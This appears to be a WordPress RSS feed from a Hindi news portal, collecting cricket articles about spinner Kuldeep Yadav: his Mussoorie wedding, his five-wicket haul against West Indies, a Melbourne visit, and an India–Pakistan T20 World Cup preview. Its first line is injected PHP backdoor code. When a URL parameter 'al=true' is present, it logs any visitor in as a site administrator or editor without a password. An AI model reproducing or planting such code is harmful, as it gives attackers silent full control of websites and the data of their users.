// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Kuldeep Yadav? – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 11 Mar 2026 15:55:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 मसूरी में कुलदीप यादव की शादी, विराट कोहली और जय शाह समेत कई दिग्गज होंगे शामिल https://pratyushaashakinayikiran.com/?p=204131 Wed, 11 Mar 2026 15:55:00 +0000 https://pratyushaashakinayikiran.com/?p=204131 मसूरी
उत्तराखंड की खूबसूरत पहाड़ियों में बसा मसूरी एक हाई-प्रोफाइल शादी के कारण चर्चा में है। भारतीय क्रिकेट टीम के स्पिन जादूगर कुलदीप यादव अपनी बचपन की दोस्त वंशिका के साथ मसूरी में 14 मार्च को शादी करने जा रहे हैं। मेहंदी और शादी की सभी रस्में मसूरी के ऐतिहासिक सेवॉय होटल में होंगे। इस शादी को लेकर होटल प्रबंधन और स्थानीय प्रशासन ने विशेष तैयारियां शुरू कर दी हैं। शादी में विराट कोहली, आईसीसी अध्यक्ष जय शाह समेत कई राजनीतिक, फिल्मी और खेल जगह की हस्तियां पहुंच सकती हैं।

सेवॉय होटल में कर्मचारियों से होटल की तैयारियों को लेकर बातचीत की। कर्मचारियों ने हालांकि कार्यक्रम गोपनीय रखने का हवाला देते हुए ज्यादा जानकारी नहीं दी, लेकिन बताया कि वे इस हाई प्रोफाइल शादी को लेकर काफी उत्साहित हैं। मसूरी में स्थानीय लोग भी अपने चहेते क्रिकेटरों को देखने के लिए उत्सुक हैं। सूत्रों का कहना है कि समारोह में भारतीय क्रिकेट जगत, राजनीति और फिल्म इंडस्ट्री की कई बड़ी हस्तियां शामिल हो सकती हैं।

मेहमानों की लंबी फेहरिस्त
मेहमानों की सूची में भारतीय क्रिकेट टीम के स्टार बल्लेबाज विराट कोहली और टीम इंडिया के कई क्रिकेटर्स आ सकते हैं। होटल के एक स्टाफ ने नाम न बताने की शर्त पर बताया कि शादी में शरीक होने के लिए आईसीसी अध्यक्ष जय शाह भी पहुंच सकते हैं। इतना ही नहीं उत्तराखंड के मुख्यमंत्री पुष्कर सिंह धामी, कई राजनीतिक हस्तियां मेहमान के तौर पर नव दंपत्ति को आशीर्वाद देने पहुंच सकते हैं।

तय कार्यक्रम के अनुसार, 13 को मेहंदी और 14 को शादी के सभी कार्यक्रम सेवॉय होटल में ही होंगे। शादी समारोह के लिए मसूरी में खास इंतजाम किए गए हैं। जानकारी के मुताबिक कई वीआईपी मेहमानों को कैंम्प्टी फॉल रोड स्थित जेडी ब्लू मेरिट होटल में ठहराने की व्यवस्था की गई है। यहां सुरक्षा, खानपान और आवागमन को लेकर विशेष व्यवस्थाएं की जा रही हैं, ताकि मेहमानों को किसी तरह की असुविधा न हो।

ब्रिटिश वास्तुकला के लिए प्रसिद्ध सेवॉय होटल
वहीं, शादी समारोह के मुख्य कार्यक्रम ऐतिहासिक सेवॉय होटल में आयोजित होंगे। ब्रिटिशकालीन वास्तुकला के लिए प्रसिद्ध यह होटल पहले भी कई राजघरानों, राजनेताओं और अंतरराष्ट्रीय मेहमानों की मेजबानी कर चुका है। अब कुलदीप यादव की शादी के कारण एक बार फिर यह होटल सुर्खियों में है।

मसूरी में उत्साह
शादी को लेकर मसूरी के पर्यटन कारोबार में भी हलचल बढ़ गई है। होटल, टैक्सी और स्थानीय कारोबारियों को उम्मीद है कि इस हाई-प्रोफाइल समारोह से पर्यटन गतिविधियों को भी बढ़ावा मिलेगा। प्रशासन की ओर से ट्रैफिक और सुरक्षा व्यवस्था को लेकर भी विशेष तैयारी की जा रही है, क्योंकि समारोह में बड़ी संख्या में वीआईपी मेहमानों के आने की संभावना है।

]]>
कुलदीप यादव का जादू चला, वेस्टइंडीज की पारी बिखरी, टीम इंडिया की शानदार वापसी https://pratyushaashakinayikiran.com/?p=185244 Mon, 13 Oct 2025 08:37:00 +0000 https://pratyushaashakinayikiran.com/?p=185244 नई दिल्ली
इंडिया वर्सेस वेस्टइंडीज दूसरा टेस्ट दिल्ली के अरुण जेटली स्टेडियम में जारी है। जॉन कैम्पबेल के बाद शे होप ने शतक जड़ दिया है। उनके बल्ले से 8 साल बाद शतक निकला है। इसी के साथ वेस्टइंडीज ने भारत पर लीड भी हासिल कर ली है। चौथे दिन का पहला सेशन वेस्टइंडीज के नाम रहा। यह इस सीरीज का पहला सेशन है जो वेस्टइंडीज ने जीता है। दिन के पहले घंटे में ही जॉन कैम्पबेल ने शतक जड़ा। वह 23 साल बाद भारत में शतक जड़ने वाले वेस्टइंडीज के पहले ओपनर बने। यह उनके करियर का भी पहला शतक है। इस सेशन में वेस्टइंडीज ने एक ही विकेट गंवाया।

वेस्टइंडीज का स्कोर 300 के पार
ग्रीव्स ने मोहम्मद सिराज को चौका लगा वेस्टइंडीज का स्कोर 300 के पार पहुंचा दिया है। वेस्टइंडीज क्या यहां से 400 तक पहुंच पाएगा? उनकी बैटिंग को देख यह काम थोड़ा मुश्किल नजर आ रहा है।

कुलदीप यादव का कहर
कुलदीप यादव ने पीयर को अपने जाल में फंसा वेस्टइंडीज को 7वां झटका दे दिया है। वेस्टइंडीज की टीम अब लड़खड़ाती हुई दिख रही है। उनके पास अभी 28 रनों की ही बढ़त है।

]]>
दिल्ली टेस्ट में कुलदीप यादव का जलवा, इंग्लैंड के दिग्गज की बराबरी कर रचा इतिहास https://pratyushaashakinayikiran.com/?p=185072 Sun, 12 Oct 2025 12:05:00 +0000 https://pratyushaashakinayikiran.com/?p=185072 नई दिल्ली 
भारत और वेस्टइंडीज के बीच दो मैचों की टेस्ट सीरीज जारी है। सीरीज का पहला मैच जीत चुकी टीम इंडिया अब दूसरा मैच भी जीतने के करीब है। भारत के पहली पारी में बनाए 518 रनों के जवाब में वेस्टइंडीज की पहली पारी सिर्फ 248 रनों पर सिमट गई। इस तरह भारत को पहली पारी में 270 रनों की भारी-भरकम बढ़त हासिल हुई। वेस्टइंडीज को सस्ते में समेटने में चाइनामैन गेंदबाज कुलदीप यादव की अहम भूमिका रही, जिन्होंने अपनी फिरकी का दम दिखाते हुए पांच विकेट झटके।

वेस्टइंडीज के खिलाफ कुलदीप का शानदार प्रदर्शन
उनके अलावा दिग्गज ऑलराउंडर रवींद्र जडेजा को तीन जबकि जसप्रीत बुमराह और मोहम्मद सिराज को एक-एक विकेट मिला। कुलदीप का यह वेस्टइंडीज के खिलाफ चौथा टेस्ट मैच है जिसमें वह अभी तक 19 विकेट चटका चुके हैं। सिर्फ टेस्ट ही नहीं, बल्कि वनडे और टी-20 इंटरनेशनल में भी कुलदीप ने वेस्टइंडीज टीम के खिलाफ शानदार प्रदर्शन किया है।

कुलदीप ने की जॉनी वार्डले की बराबरी
अपने इस 'पंजे' के साथ वह बाएं हाथ के कलाई के स्पिनरों में सबसे ज्यादा बार पांच विकेट हॉल लेने के मामले में इंग्लैंड के जॉनी वार्डले के साथ संयुक्त रूप से पहले नंबर पर हैं। जहां वार्डले ने 28 टेस्ट मैचों में यह काम किया था। वहीं कुलदीप ने पांच 15 मैच लिए हैं। इन दोनों के बाद साउथ अफ्रीका के पॉल एडम्स हैं जिन्होंने 45 मैचों में चार बार फाइव विकेट हॉल लिया है।

]]>
ऑस्ट्रेलिया और भारत के बीच शानदार क्रिकेट मुकाबले की उम्मीद कर रहे हैं : कुलदीप यादव https://pratyushaashakinayikiran.com/?p=63354 Fri, 23 Aug 2024 16:20:00 +0000 https://pratyushaashakinayikiran.com/?p=63354 मेलबर्न
इस साल के अंत में ऑस्ट्रेलिया के खिलाफ पांच मैचों की टेस्ट सीरीज से पहले, भारत के स्पिनर कुलदीप यादव विश्व क्रिकेट की दो शक्तियों के बीच होने वाले शानदार क्रिकेट मुकाबले का इंतजार कर रहे हैं। अपना उत्साह व्यक्त करते हुए, कुलदीप ने कहा, “यहां क्रिकेट ऑस्ट्रेलिया के मुख्यालय और प्रतिष्ठित एमसीजी में होना बहुत अच्छा है। मैं बॉर्डर-गावस्कर ट्रॉफी का इंतजार कर रहा हूं और हम इस साल ऑस्ट्रेलिया और भारत के बीच शानदार क्रिकेट मुकाबले की उम्मीद कर रहे हैं।'' उन्होंने भारतीय क्रिकेट प्रशंसकों के अटूट समर्थन को भी स्वीकार करते हुए कहा, “भारत के क्रिकेट प्रशंसक हमेशा दुनिया भर में टीम का समर्थन करते हैं, और मुझे विश्वास है कि वे बॉर्डर-गावस्कर ट्रॉफी के लिए बड़ी संख्या में आएंगे, खासकर बॉक्सिंग डे टेस्ट के दौरान।"

कुलदीप, जो इस समय एक छोटी पारिवारिक यात्रा पर मेलबर्न में हैं, ने हाल ही में प्रतिष्ठित मेलबर्न क्रिकेट ग्राउंड (एमसीजी) में एक महत्वपूर्ण पड़ाव डाला। अपनी यात्रा के दौरान, स्पिनर ने स्टेडियम के बाहर अपने आदर्श दिवंगत शेन वार्न की मूर्ति के साथ एक तस्वीर खिंचवाई।

उस पल को याद करते हुए, उन्होंने साझा किया, “शेन वार्न मेरे आदर्श थे, और मेरा उनके साथ बहुत मजबूत संबंध था। जब मैं वॉर्नी के बारे में सोचता हूं तो मैं अब भी भावुक हो जाता हूं-ऐसा लगता है जैसे मैंने अपने परिवार से किसी को खो दिया है।''

कुलदीप की मेलबर्न यात्रा में क्रिकेट ऑस्ट्रेलिया (सीए) मुख्यालय का दौरा भी शामिल था। क्रिकेट ऑस्ट्रेलिया के सीईओ निक हॉकले ने एक ऑनलाइन बातचीत के जरिए उनका गर्मजोशी से स्वागत किया। क्रिकेट ऑस्ट्रेलिया ने कुलदीप को आगामी ऑस्ट्रेलियाई गर्मियों का एक सिंहावलोकन प्रस्तुत किया, जिसमें उत्साह पर प्रकाश डाला गया क्योंकि भारत और पाकिस्तान दोनों इस साल ऑस्ट्रेलिया का दौरा करने के लिए तैयार हैं। भारत और ऑस्ट्रेलिया के बीच पहला टेस्ट 22 नवंबर से पर्थ के ऑप्टस स्टेडियम में खेला जाएगा।

 

]]>
आत्मविश्वास से ओतप्रोत और हालात के अनुकूल ढल चुकी भारतीय टीम पाकिस्तान के खिलाफ करेगी एक तीर से दो शिकार https://pratyushaashakinayikiran.com/?p=39190 Sat, 08 Jun 2024 17:50:00 +0000 https://pratyushaashakinayikiran.com/?p=39190 नई दिल्ली
आत्मविश्वास से ओतप्रोत और हालात के अनुकूल ढल चुकी भारतीय टीम नासाउ काउंटी की पेचीदा पिच पर टी20 वर्ल्ड कप 2024 के बहुचर्चित मुकाबले में रविवार को चिर प्रतिद्वंद्वी पाकिस्तान से भिड़ेगी जिसका मनोबल पहले ही मैच में मिली अप्रत्याशित हार ने तोड़ दिया है। टूर्नामेंट में सबसे ज्यादा भीड़ खींचने वाला मुकाबला न्यूयॉर्क के नासाउ काउंटी इंटरनेशनल स्टेडियम पर खेला जाएगा, जिसकी दर्शक क्षमता 34000 है। इस मैदान की पिच लगातार चर्चा का विषय बनी हुई है। इसकी भारी आलोचना के बाद आईसीसी ने आधिकारिक रूप से इसे स्वीकार किया।

अब तक इस स्टेडियम पर हुए तीन मैचों की छह पारियों में दो बार ही टीमें 100 रन के पार पहुंच सकी हैं। पूर्व क्रिकेटरों को तो यह भी लगता है कि कम स्कोर वाले मैचों से कैसे अमेरिकी बाजार में क्रिकेट का प्रचार प्रसार किया जाएगा। एडीलेड ओवल के मैदानकर्मी डेमियन हाउज के मार्गदर्शन में अप्रैल में यहां चार 'ड्रॉप इन' पिचें बिछाई गई जो अभी तक जम नहीं पाई हैं। पिच से मिल रहा असमान उछाल बल्लेबाजों की सुरक्षा पर सवालिया ऊंगली उठा रहा है। भारतीय कप्तान रोहित शर्मा को आयरलैंड के खिलाफ मैच में कंधे में चोट लगी थी जिससे उन्हें मैदान छोड़ना पड़ा।

रोहित ने मैच के बाद कहा था, ''ईमानदारी से कहूं तो मुझे नहीं पता कि पिच से क्या अपेक्षा की जाए। हम हालात के अनुरूप तैयारी करेंगे। पाकिस्तान के खिलाफ मैच में हर खिलाड़ी को योगदान देना होगा।'' भारत के मैच के एक दिन बाद आईसीसी को पिच को लेकर तमाम आशंकाओं के निवारण के लिये बयान जारी करना पड़ा। पाकिस्तान टीम ने अभी तक नासाउ स्टेडियम पर खेला नहीं है। पहले मैच में अमेरिका से हारने वाली पाकिस्तानी टीम बृहस्पतिवार की रात ही यहां पहुंची है। उन्हें हालात के अनुरूप ढलने का मौका नहीं मिल सका है जिसका उन्हें नुकसान हो सकता है।

भारत से हारने पर सुपर आठ चरण में उसके प्रवेश की राह लगभग असंभव हो जाएगी। आयरलैंड के खिलाफ भारत ने बाएं हाथ के कलाई के स्पिनर कुलदीप यादव को नहीं उतारा और एक अतिरिक्त विशेषज्ञ तेज गेंदबाज को जगह दी गई। पाकिस्तान के खिलाफ भी यही संयोजन रहने की उम्मीद है क्योंकि मैच ऐसी टर्फ पर खेला जाएगा जो नई है। दक्षिण अफ्रीका और नीदरलैंड अलग टर्फ पर आठ जून को खेल रहे हैं। कुलदीप के मौजूदा फॉर्म और पाकिस्तानी बल्लेबाजों खासकर बाबर आजम के खिलाफ उनकी उपयोगिता को देखते हुए उन्हें उतारा जा सकता है। ऐसे में अक्षर पटेल या रविंद्र जडेजा में से एक को बाहर रहना होगा।

बल्लेबाजी में रोहित और विराट कोहली पारी का आगाज करेंगे जबकि ऋषभ पंत तीसरे नंबर पर उतरेंगे। दूसरी ओर पाकिस्तान के सामने बड़ी चुनौती पहले मैच में मिली हार को भुलाने की है। अमेरिका के खिलाफ पहले मैच में सुपर ओवर में मिली हार ने एक बार फिर साबित कर दिया कि पाकिस्तान टीम इतनी अप्रत्याशित क्यो मानी जाती है। बाबर ने हार का ठीकरा गेंदबाजों पर फोड़ा लेकिन यह नहीं भूलना चाहिए कि बल्लेबाजों ने भी निराश किया। खुद बाबर ने 44 रन बनाने के लिये 43 गेंद खेल डाली। वैसे तेज गेंदबाजों की मददगार पिच पर शाहीन शाह अफरीदी की अगुवाई में पाकिस्तान का तेज आक्रमण कहर बरपाने का दम रखता है बशर्ते वे अपनी क्षमता के साथ न्याय करें।

टूर्नामेंट की शुरुआत में आईएसआईएस से मिली आतंकी धमकी के बाद मैच की सुरक्षा के चाक चौबंद उपाय किए गए हैं। नासाउ काउंटी के पुलिस कमिश्नर पैट्रिक राइडर ने हाल ही में सुरक्षा इंतजामात की जानकारी दी थी। उन्होंने कहा था, ''भारत पाकिस्तान मैच के लिये सुरक्षा इंतजाम उसी तरह के हैं जब कुछ साल पहले तत्कालीन अमेरिकी राष्ट्रपति बराक ओबामा के स्वागत के लिए किए गए थे।'' मैच का समय: रात आठ बजे से।

भारत का स्क्वॉड: रोहित शर्मा (कप्तान), हार्दिक पांड्या, यशस्वी जायसवाल, विराट कोहली, सूर्यकुमार यादव, ऋषभ पंत, संजू सैमसन, शिवम दुबे, रवींद्र जडेजा, अक्षर पटेल, कुलदीप यादव, युजवेंद्र चहल, अर्शदीप सिंह, जसप्रीत बुमराह, मोहम्मद सिराज।

पाकिस्तान का स्क्वॉड:: बाबर आजम (कप्तान), अबरार अहमद, आजम खान, फखर जमान, हारिस रऊफ, इफ्तिखार अहमद, इमाद वसीम, मोहम्मद अब्बास अफरीदी, मोहम्मद आमिर, मोहम्मद रिजवान, नसीम शाह, सैम अयूब, शादाब खान, शाहीन शाह अफरीदी, उस्मान खान।

 

]]>